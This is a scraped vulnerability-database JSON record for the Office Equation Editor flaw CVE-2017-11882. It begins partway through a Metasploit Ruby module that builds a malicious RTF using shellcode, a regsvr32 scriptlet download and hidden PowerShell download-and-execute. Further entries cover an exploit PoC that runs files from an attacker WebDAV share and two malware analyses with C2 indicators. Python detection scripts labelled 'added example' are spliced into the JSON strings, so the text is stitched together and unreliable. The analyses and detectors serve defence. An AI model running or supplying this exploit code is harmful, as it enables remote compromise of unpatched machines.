'3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\r\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\r\n footer << '00030000000000' + \"\\n\"\r\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\r\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\r\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\r\n footer << 
\"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\r\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\r\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\r\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\r\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\r\n footer << \"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\r\n footer << \"00000000\\n\"\r\n footer << \"}}}\\n\"\r\n footer << '\\par}' + \"\\n\"\r\n\r\n\r\n payload = shellcode\r\n payload += [0x00402114].pack(\"V\")\r\n payload += \"\\x00\" * 2\r\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\r\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\r\n payload = header + object_class + payload + footer\r\n payload\r\n end\r\n\r\n\r\n\r\n def gen_psh(url, *method)\r\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\r\n\r\n if method.include? 'string'\r\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\r\n else\r\n # Random filename to use, if there isn't anything set\r\n random = \"#{rand_text_alphanumeric 8}.exe\"\r\n # Set filename (Use random filename if empty)\r\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\r\n\r\n # Set path (Use %TEMP% if empty)\r\n path = datastore['BinaryEXE-PATH'].blank? ? 
\"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\r\n\r\n # Join Path and Filename\r\n file = %Q(echo (#{path}+'\\\\#{filename}'))\r\n\r\n # Generate download PowerShell command\r\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\r\n end\r\n\r\n download_and_run = \"#{ignore_cert}#{download_string}\"\r\n\r\n # Generate main PowerShell command\r\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\r\n end\r\n\r\n def on_request_uri(cli, _request)\r\n if _request.raw_uri =~ /\\.sct$/\r\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\r\n payload = gen_psh(\"#{get_uri}\", \"string\")\r\n data = gen_sct_file(payload)\r\n send_response(cli, data, 'Content-Type' => 'text/plain')\r\n else\r\n print_status(\"Delivering payload to #{cli.peerhost}...\")\r\n p = regenerate_payload(cli)\r\n data = cmd_psh_payload(p.encoded,\r\n payload_instance.arch.first,\r\n remove_comspec: true,\r\n exec_in_place: true\r\n )\r\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\r\n end\r\n end\r\n\r\n\r\n def rand_class_id\r\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\r\n end\r\n\r\n\r\n def gen_sct_file(command)\r\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\r\n if command == ''\r\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\r\n # If a command is provided, tell the target system to execute it.\r\n else\r\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\r\n 
end\r\n end\r\n\r\n\r\n def primer\r\n file_create(generate_rtf)\r\n end\r\nend\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/29119", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Office - OLE Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-20T00:00:00", "title": "Microsoft Office - OLE Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2017-11-20T00:00:00", "id": "EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB", "href": "", "sourceData": "Source: https://github.com/embedi/CVE-2017-11882\n\nCVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/\n\nMITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882\n\nResearch: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about\n\nPatch analysis: 
https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html\n\nDEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410\n\nwebdav_exec CVE-2017-11882\n\nA simple PoC for CVE-2017-11882. This exploit triggers the WebClient service to start and then executes a remote file from an attacker-controlled WebDAV server. The approach is useful because the length of the command the exploit can execute is limited; with WebDAV, an arbitrary attacker-controlled executable can still be launched on the vulnerable machine. The script creates a simple document with several OLE objects, each of which exploits CVE-2017-11882, so the commands are executed in sequence.\n\nThe first command, which triggers the WebClient service to start, may look like this:\n\ncmd.exe /c start \\\\attacker_ip\\ff\nThe attacker-controlled binary path should be a UNC network path:\n\n\\\\attacker_ip\\ff\\1.exe\nUsage\n\nwebdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name\nSample exploit for CVE-2017-11882 (starting calc.exe as payload)\n\nThe example folder holds an .rtf file which exploits CVE-2017-11882 and runs the calculator on the system.\n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43163.zip", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "carbonblack": [{"lastseen": "2019-03-20T21:05:12", "description": "In analyzing the stream of raw emails seen in the wild, TAU discovered a campaign of what first appeared to be a fairly standard spear-phishing attack. The email contained a Word document which carried an exploit for [CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>), a vulnerability that allows for Microsoft Office documents to run arbitrary code. 
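The Metasploit module above writes its command into an Equation.3 OLE object whose bytes go into the RTF \objdata stream, and the embedi PoC chains several such objects in one document. A static triage check that pulls those streams out and looks for the Equation Editor CLSID or ProgID sitting next to an embedded command string, as an added example in Python (not code from Metasploit, embedi or Carbon Black). The CLSID bytes, the "Equation.3" ProgID and the regsvr32/scrobj.dll command come from the page; the sample RTF, the minimal OLE 1.0 object header used to build it, the 203.0.113.5 address and the extra LOLBin markers (mshta, powershell) are constructed assumptions for the demonstration:

```python
"""Static triage of RTF files for Equation Editor (Equation.3) OLE objects that
carry an embedded shell command, the shape of CVE-2017-11882 documents built by
the Metasploit module and the embedi PoC above.

Added example, not code from either project. The CLSID, ProgID and command
strings are taken from the page; the sample RTF and the 203.0.113.5 address
are constructed for this demonstration.
"""
import re
from typing import Dict, List

# {0002CE02-0000-0000-C000-000000000046} in on-disk GUID byte order, exactly
# the "02ce020000000000c000000000000046" run in the module's object_class hex.
EQUATION_CLSID = bytes.fromhex("02ce020000000000c000000000000046")
EQUATION_PROGIDS = (b"Equation.3", b"Microsoft Equation 3.0")
# Command fragments present in the payloads on this page, plus a few LOLBin
# names added as assumptions about what a practitioner would also want flagged.
COMMAND_MARKERS = (b"cmd.exe", b"regsvr32", b"scrobj.dll", b"\\\\",
                   b"http://", b"https://", b"mshta", b"powershell")

OBJDATA_RE = re.compile(r"\\objdata\s*([0-9a-fA-F\s]+)")


def extract_objdata(rtf: str) -> List[bytes]:
    """Decode every \\objdata hex stream in the document (whitespace-tolerant)."""
    blobs = []
    for match in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(r"\s+", "", match.group(1))
        if len(hexdata) % 2:          # tolerate a truncated trailing nibble
            hexdata = hexdata[:-1]
        try:
            blobs.append(bytes.fromhex(hexdata))
        except ValueError:
            continue
    return blobs


def printable_runs(data: bytes, min_len: int = 8) -> List[bytes]:
    """ASCII runs of at least min_len bytes, like the `strings` utility."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


def scan_objdata(blob: bytes) -> Dict:
    """Flag an object that is Equation Editor's AND carries a command string."""
    is_equation = EQUATION_CLSID in blob or any(p in blob for p in EQUATION_PROGIDS)
    commands = [run.decode("ascii") for run in printable_runs(blob)
                if any(marker in run for marker in COMMAND_MARKERS)]
    return {"equation_object": is_equation,
            "commands": commands,
            "suspicious": is_equation and bool(commands)}


def scan_rtf(rtf: str) -> List[Dict]:
    return [scan_objdata(blob) for blob in extract_objdata(rtf)]


# --- constructed sample input (not from the page) ---------------------------
OLE1_HEADER = (b"\x01\x05\x00\x00"                  # OLE version
               + b"\x02\x00\x00\x00"                # format: embedded object
               + b"\x0b\x00\x00\x00Equation.3\x00"  # class name, NUL-terminated
               + b"\x00" * 8)                       # empty topic and item names
MALICIOUS_OBJDATA = (OLE1_HEADER + EQUATION_CLSID + b"\x00" * 24
                     + b"regsvr32 /s /n /u /i:http://203.0.113.5/a.sct scrobj.dll\x00"
                     + b"\x00" * 32)
BENIGN_OBJDATA = (OLE1_HEADER + EQUATION_CLSID + b"\x00" * 24
                  + b"Times New Roman\x00" + b"\x00" * 32)


def build_sample_rtf(objdata: bytes) -> str:
    """Wrap raw OLE1 bytes in a minimal RTF document the way writers emit it."""
    hexdata = objdata.hex()
    lines = "\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return ("{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Equation.3}"
            "{\\*\\objdata\n" + lines + "\n}}\\par}")


if __name__ == "__main__":
    for label, data in (("malicious", MALICIOUS_OBJDATA), ("benign", BENIGN_OBJDATA)):
        for result in scan_rtf(build_sample_rtf(data)):
            print(label, result)
```

A benign equation object carries the same CLSID and ProgID, so those alone are an inventory signal rather than an alert; it is the readable command text inside the object data that separates a CVE-2017-11882 document built like the module above from a real equation. For Word binary and OOXML containers the RTF or OLE streams have to be extracted first and then fed to `scan_objdata`.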
This exploit is [nothing new](<https://www.carbonblack.com/2017/11/22/threat-analysis-exploit-allows-for-code-execution-in-vulnerable-versions-of-microsofts-equation-editor/>), and Microsoft released a patch for this back in late 2017. This particular CVE exploits a memory corruption issue in the Equation Editor, found in certain versions of Microsoft Office. Successful exploitation of this vulnerability can lead to remote code execution on a vulnerable system. Nevertheless, we continued on with the investigation by pivoting on this particular Microsoft Word document, to then discover ten recent similar Word documents submitted to VirusTotal a total of 17 times within a four-day period in February. Out of the seventeen submissions, the majority were submitted from Italy, Czech Republic, Germany, Ukraine, United Kingdom and Austria. There were two that were submitted from the U.S, and one that was submitted from the United Arab Emirates.\n\nBehavioral Summary\n\nWhile this attack is based upon a malicious Word document, we can see the attack behavior take place using legitimate Windows applications such as the Office Equation Editor, an application used to generate complex mathematical equations. Equation Editor has a well-known vulnerability that is used in this instance to reach out to multiple online sites to download additional payloads. This behavior is tracked, as shown in the process tree below. The overall characteristics of the attack are also notable based upon the various TTPs used, also shown below in the alert summary.\n\n__\n\n\n\nDetails\n\nWhen the email attachment is opened, the Equation Editor process (**Eqnedt32.exe**) spawns under **svchost.exe** signifying the successful execution of the exploit embedded in the Word document. It then immediately calls out to a remote web address **hxxp://sunrypero.cf **and downloads a JPG file called **1126rjduu76.jpg**. (At the time this sample was detonated, this domain name was live. 
The domain had been registered with Freenom and used the top-level domain \u201c.cf\u201d, which was originally created for use by the Central African Republic). Despite hosting a Word document and two JPG files at the sunrypero.cf domain, the JPG files were in fact found to be PE files.\n\n__\n\nOnce the particular JPG file is downloaded, it is saved into the user\u2019s **%temp%** folder as \u201c**tryui.exe**\u201d. The icon for this file is shown below.\n\n__\n\nOddly, the actor(s) didn\u2019t include any error handling in their code, so if an HTTP request cannot be established, the error message box (shown below) is displayed shortly after the Word document is opened.\n\n__\n\nA quick glance at the tryui.exe file returned the following string, which pertains to the software known as AutoHotKey, version 1.1.23.00.\n\n__\n\nTaken from their [website](<https://www.autohotkey.com/>), \u201c_AutoHotkey is a free, open-source scripting language for Windows that allows users to easily create small to complex scripts for all kinds of tasks such as: form fillers, auto-clicking, macros, etc_\u201d.\n\nMalware that abuses AutoHotKey isn\u2019t a new concept, and a quick search returned a tool written by Amit Serper called [ahk-dumper](<https://github.com/aserper/ahk-dumper>). This tool essentially dumps out the script from the RDATA section of the PE file. When run against the **tryui.exe** file it presented 143 lines of code (thank you Amit!). The code can be broken down into the following pieces:\n\n 1. Uses RegExReplace to hide the string \u201cCallWindowProc\u201d used by \u201cUser32.dll\u201d\n 2. Uses RegExReplace to hide the string showing a hard-coded path for the Microsoft Regasm utility at \u201cC:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe\u201d\n 3. Uses \u201cInternetGetConnectedState\u201d from \u201cwininet.dll\u201d to wait for a network connection, otherwise sleeping for 1 second and retrying\n 4. 
Create a COM object using \u201cWinHttpRequest.5.1\u201d in order to get the payload found at either hxxps://share.dmca.gripe/bNdw3tI5XtihAdic.jpg or hxxps://paste.ee/r/KyH5C\n 5. Copy downloaded file(s) into the user\u2019s %Temp% folder\n 6. Create file shortcut in Startup folder, and set file attributes to System, Hidden, ReadOnly\n\nThe last part is the base64 decoding routine, which uses a combination of the RegexReplace and Flip functions as shown below. The flip function simply reverses the order of the given string. The ltrim and rtrim trims characters either from the beginning (left) or end (right) of the string.\n\n\n\nPart of the base64 routine is shown below.\n\n\n\nIn other words, when the tryui.exe file runs, it downloads a base64 encoded string from hxxps://paste.ee/r/KyH5C address (which is a site that offers similar features to PasteBin), as well as another site which was temporarily used to host a second JPG file at hxxps://share.dmca.gripe/bNdw3tI5XtihAdic.jpg. Using the two separate base64 encoded strings, it compiles a binary which is then used to install and register the C2 and keylogger component.\n\n\n\nAs long as the Regasm.exe tool is found in the hard coded path shown above, the tryui.exe will invoke regasm and use it to merge the two base64 encoded strings in order to form a separate executable file. It places what appears to be a legitimate Regasm binary disguised as natmon.exe into the locations listed below for persistence. 
Comparing similar files suggests that this has been used to avoid detection.\n\nKey: HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\NAT Monitor\\ \nName: NAT Monitor \nValue: C:\\Program Files (x86)\\NAT Monitor\\natmon.exe \n\nThe final part of the attack turns out to be the delivery of the NanoCore trojan, which includes a keylogger and originally communicated back to its C2 in the Netherlands over an unencrypted channel on TCP port 2960. Shortly after this sample was tested, the actor(s) updated their C2 to use SSL over TCP port 443 in order to hide the data sent to and from the C2 server.\n\n**Side note:**\n\nAs the path for Regasm.exe is hard-coded within the AutoHotKey script, if Regasm.exe is not present at that path the malware will not run any further. However, copying a newer version of .NET\u2019s Regasm.exe from a more recent folder path, e.g. \"C:\\Windows\\Microsoft.NET\\Framework\\**v4.x**\", permits **tryui.exe** to launch Regasm and register an application.\n\nWhile none of the above techniques are necessarily new, it is interesting to see how AutoHotKey continues to grow in popularity amongst malware authors, and how malicious scripts embedded within the legitimate AutoHotKey compiled binary are becoming more sophisticated in order to fly under the radar of modern detection and prevention products.\n\nIf you are a Carbon Black customer and looking for more information on how CB products defend against this attack, [click here.](<https://community.carbonblack.com/t5/Threat-Research-Docs/TAU-TIN-NanoCore-Old-Malware-New-Tricks/ta-p/69286#M2641>)\n\nRemediation:\n\n**MITRE ATT&CK TIDs**\n\nTID | Tactic | Description\n---|---|---\n[T1204](<https://attack.mitre.org/techniques/T1204/>) | Execution | User execution via opening of email attachment\n[T1027](<https://attack.mitre.org/techniques/T1027/>) | Defense Evasion | Obfuscated files or information\n[T1121](<https://attack.mitre.org/techniques/T1121/>) | Defense Evasion, Execution | Proxying of code execution through Regasm\n[T1203](<https://attack.mitre.org/techniques/T1203/>) | Execution | Exploitation for Client Execution\n[T1036](<https://attack.mitre.org/techniques/T1036/>) | Defense Evasion | Masquerading\n[T1060](<https://attack.mitre.org/techniques/T1060/>) | Persistence | Registry Run Keys / Startup Folder\n[T1121](<https://attack.mitre.org/techniques/T1121/>) | Defense Evasion, Execution | Regsvcs/Regasm\n\nIndicators of Compromise (IOCs)\n\nIndicator | Type | Context\n---|---|---\n88334ec58de64e4a174dbf8b7027f916 | MD5 | Quotation_Sheet_#RFQ190207.doc Word Document\ncfea6ae1730a9dd580e2d5b633f1785357d50af8e07768081b3f50139144259b | SHA256 | Quotation_Sheet_#RFQ190207.doc Word Document\n20bc6c4211538b4eb7a756cfafeb0c39 | MD5 | Tryui.exe\n3c32a519c6ea39670cb610a190cdcf3acd9a7e00b11d93d05d7395a2de0bb1ff | SHA256 | Tryui.exe\n780492fd6099b8e29fb10b454a1d7b13 | MD5 | Nanocore\n391276372a25e0c0b5a4650d6454dbea85cc2e941970a2ccd7a42323b7e82141 | SHA256 | Nanocore\nhxxp://sunrypero.cf | URL | C2\nhxxps://paste.ee/r/KyH5C | URL | C2\nhxxps://share.dmca.gripe | URL | C2\n185.244.30.106 | IP | C2\n\nThe post [TAU Threat Intelligence Notification: NanoCore - Old Malware, New Tricks!](<https://www.carbonblack.com/2019/03/20/tau-threat-intelligence-notification-nanocore-old-malware-new-tricks/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-03-20T19:14:15", "type": "carbonblack", "title": "TAU Threat Intelligence Notification: NanoCore \u2013 Old Malware, New Tricks!", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2019-03-20T19:14:15", "id": "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "href": "https://www.carbonblack.com/2019/03/20/tau-threat-intelligence-notification-nanocore-old-malware-new-tricks/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2019-05-28T03:24:00", "description": "Background overview \nAgentTesla started out in 2014 as a simple keylogger. Since then its developers have kept adding features and selling it, and it is now a commercial spyware whose builder lets the buyer generate a trojan with the capabilities they want. \nAgentTesla spreads mostly by phishing email: the attachment is a malicious document that uses a macro or an exploit to download and run the malware. The Sangfor security team recently collected samples that spread AgentTesla through CVE-2017-11882 and analysed the attack chain in detail. \nDetailed analysis \nCVE-2017-11882 \n1. Monitoring file activity while the document is opened shows the system starting the eqnedt32.exe process, and a packet capture shows an EXE being downloaded, which identifies the sample as using CVE-2017-11882 to execute malicious code: \n![](/Article/UploadPic/2019-5/201952872350787.png) \n2. With a debugger attached and a breakpoint on Kernel32!WinExec, the registers show the command \"C:\\Users\\root\\AppData\\Roaming\\Adobe.exe\" being run. Together with the captured traffic this indicates that the malicious code downloads a file to disk and then runs it, presumably through the URLDownloadToFile family of APIs: \n![](/Article/UploadPic/2019-5/201952872351853.png) \n3. Breakpoints on the network-related APIs were never hit, so a breakpoint was placed on the function in eqnedt32.exe that overflows; single-stepping to its ret shows the overwritten return address transferring control to the malicious code: \n![](/Article/UploadPic/2019-5/201952872353745.png) \n4. The malicious code first decrypts itself in memory. The figures show the region before and after decryption; the decrypted strings make clear that it resolves API addresses dynamically, calls URLDownloadToFileW to fetch the file, and then runs it with WinExec: \n![](/Article/UploadPic/2019-5/201952872354449.png) \n![](/Article/UploadPic/2019-5/201952872356708.png) \nAgentTesla \n1. AgentTesla is a keylogger written on the .NET Framework. In a decompiler the custom function names are obfuscated, but the API calls and keyword strings are still in plain text, and the keystroke-logging code is easy to spot: \n![](/Article/UploadPic/2019-5/201952872358476.png) \n2. Besides keylogging, it collects host information by reading registry values: \n![](/Article/UploadPic/2019-5/201952872359416.png) \n3. The data to be exfiltrated is encrypted with DES: \n![](/Article/UploadPic/2019-5/20195287240111.png) \n4. The stolen data can be uploaded to the remote C&C in one of three ways: \nVia FTP: \n![](/Article/UploadPic/2019-5/20195287241828.png) \nVia SMTP: \n![](/Article/UploadPic/2019-5/20195287242974.png) \nVia HTTP: \n![](/Article/UploadPic/2019-5/20195287243766.png) \n5. AgentTesla embeds in its resources a DLL named IELibrary.dll that implements the browser operations. AgentTesla defines the names of the browsers and network tools whose data it steals; these are options chosen when the malware is generated from the control panel: \n![](/Article/UploadPic/2019-5/20195287244718.png) \n6. IELibrary.dll is mainly used to collect and manipulate browser data, including adding, deleting and querying history entries: \n![](/Article/UploadPic/2019-5/20195287244281.png) \nStealing passwords and cookies: \n![](/Article/UploadPic/2019-5/20195287245577.png) \nSolutions \nVirus defense \n1. Do not download software from unknown websites, do not open email attachments from unknown senders, and do not enable macros casually; \n2. Download and apply the patch for CVE-2017-11882: \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 \n3. Turn on Windows Update so the system receives updates automatically and regularly; \n4. Sangfor firewall customers are advised to upgrade to version AF805 and enable the SAVE artificial intelligence engine for the best protection; \nFinally, enterprises are advised to run a network-wide security check and antivirus scan to strengthen their defenses. 
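The process tree in the Carbon Black write-up and the debugger trace in the Sangfor analysis above describe the same chain: eqnedt32.exe fetches a file, writes an executable under the user profile and runs it, and the dropper goes on to proxy through Regasm and persist with a Run key. Those observations turned into detection rules over endpoint telemetry, as an added example in Python (not part of either write-up). The events are constructed here in a simplified Sysmon-like dict shape; the IOC hosts, IP and SHA256 values are the ones in the Carbon Black table, the file paths and user name are assumptions, and 203.0.113.9 is a placeholder address. Note that eqnedt32.exe starting under svchost.exe is how any out-of-process COM server gets launched, so the rules key on what Equation Editor does next rather than on its parent:

```python
"""Detection rules for the post-exploitation chain the Carbon Black and Sangfor
analyses above describe: Equation Editor (eqnedt32.exe) reaching out to the
web, dropping an executable under the user profile and launching it, the
dropper proxying through regasm.exe, and persistence via a Run key.

Added example, not part of either write-up. Events are constructed here in a
simplified Sysmon-like dict shape; IOC hosts, IP and hashes are the ones in the
Carbon Black table, and 203.0.113.9 is a placeholder address.
"""
import re
from typing import Dict, List

EQUATION_EDITOR = "eqnedt32.exe"
IOC_HOSTS = {"sunrypero.cf", "paste.ee", "share.dmca.gripe"}
IOC_IPS = {"185.244.30.106"}
IOC_SHA256 = {
    "cfea6ae1730a9dd580e2d5b633f1785357d50af8e07768081b3f50139144259b": "Quotation_Sheet_#RFQ190207.doc",
    "3c32a519c6ea39670cb610a190cdcf3acd9a7e00b11d93d05d7395a2de0bb1ff": "tryui.exe",
    "391276372a25e0c0b5a4650d6454dbea85cc2e941970a2ccd7a42323b7e82141": "NanoCore",
}
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?(\\|$)", re.I)
USER_DIR_RE = re.compile(r"\\(AppData|Temp)\\", re.I)   # user-writable drop locations


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict) -> List[Dict]:
    """Return the {rule, severity} hits for one event (empty list if benign)."""
    hits = []
    kind = event.get("type")
    image = basename(event.get("image", ""))
    parent_path = event.get("parent_image", "")
    parent = basename(parent_path)

    if kind == "process_create":
        # Starting under svchost.exe is how any out-of-process COM server is
        # launched, so the parent of eqnedt32.exe is not a signal; a child of
        # eqnedt32.exe is, because Equation Editor never launches programs.
        if parent == EQUATION_EDITOR:
            hits.append({"rule": "eqnedt32_child_process", "severity": "high"})
        if image == "regasm.exe" and USER_DIR_RE.search(parent_path):
            hits.append({"rule": "regasm_from_user_dir", "severity": "medium"})
    elif kind == "network_connect":
        if image == EQUATION_EDITOR:
            hits.append({"rule": "eqnedt32_network", "severity": "high"})
        if (event.get("dest_host", "").lower() in IOC_HOSTS
                or event.get("dest_ip", "") in IOC_IPS):
            hits.append({"rule": "ioc_c2_match", "severity": "high"})
    elif kind == "file_create":
        target = event.get("target", "")
        if image == EQUATION_EDITOR and target.lower().endswith(".exe") and USER_DIR_RE.search(target):
            hits.append({"rule": "eqnedt32_drops_exe", "severity": "high"})
        if event.get("sha256", "").lower() in IOC_SHA256:
            hits.append({"rule": "ioc_hash_match", "severity": "high"})
    elif kind == "registry_set" and RUN_KEY_RE.search(event.get("key", "")):
        data = event.get("data", "")
        if "natmon.exe" in data.lower() or event.get("value_name", "").lower() == "nat monitor":
            hits.append({"rule": "nanocore_run_key", "severity": "high"})
        elif USER_DIR_RE.search(data) or USER_DIR_RE.search(event.get("image", "")):
            hits.append({"rule": "run_key_from_user_dir", "severity": "medium"})
    return hits


def triage(events: List[Dict]) -> Dict[int, List[Dict]]:
    """Index -> hits for every event that matched at least one rule."""
    results = {}
    for index, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            results[index] = hits
    return results


# Constructed telemetry, in the order the Carbon Black write-up reports it.
EQN = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROPPER = r"C:\Users\bob\AppData\Local\Temp\tryui.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe"
SAMPLE_EVENTS = [
    {"type": "process_create", "image": EQN, "parent_image": r"C:\Windows\System32\svchost.exe"},
    {"type": "network_connect", "image": EQN, "dest_host": "sunrypero.cf", "dest_ip": "203.0.113.9", "dest_port": 80},
    {"type": "file_create", "image": EQN, "target": DROPPER,
     "sha256": "3c32a519c6ea39670cb610a190cdcf3acd9a7e00b11d93d05d7395a2de0bb1ff"},
    {"type": "process_create", "image": DROPPER, "parent_image": EQN},
    {"type": "process_create", "image": REGASM, "parent_image": DROPPER},
    {"type": "registry_set", "image": REGASM,
     "key": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "NAT Monitor", "data": r"C:\Program Files (x86)\NAT Monitor\natmon.exe"},
    {"type": "process_create", "image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for index, hits in sorted(triage(SAMPLE_EVENTS).items()):
        print(index, SAMPLE_EVENTS[index]["type"], [h["rule"] for h in hits])
```

The behavioural rules (child process, network connection and executable drop by eqnedt32.exe) are the durable part: they fire on any CVE-2017-11882 chain, including the Adobe.exe variant in the Sangfor analysis, while the IOC lookups only catch this campaign and go stale as soon as the actor re-registers.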
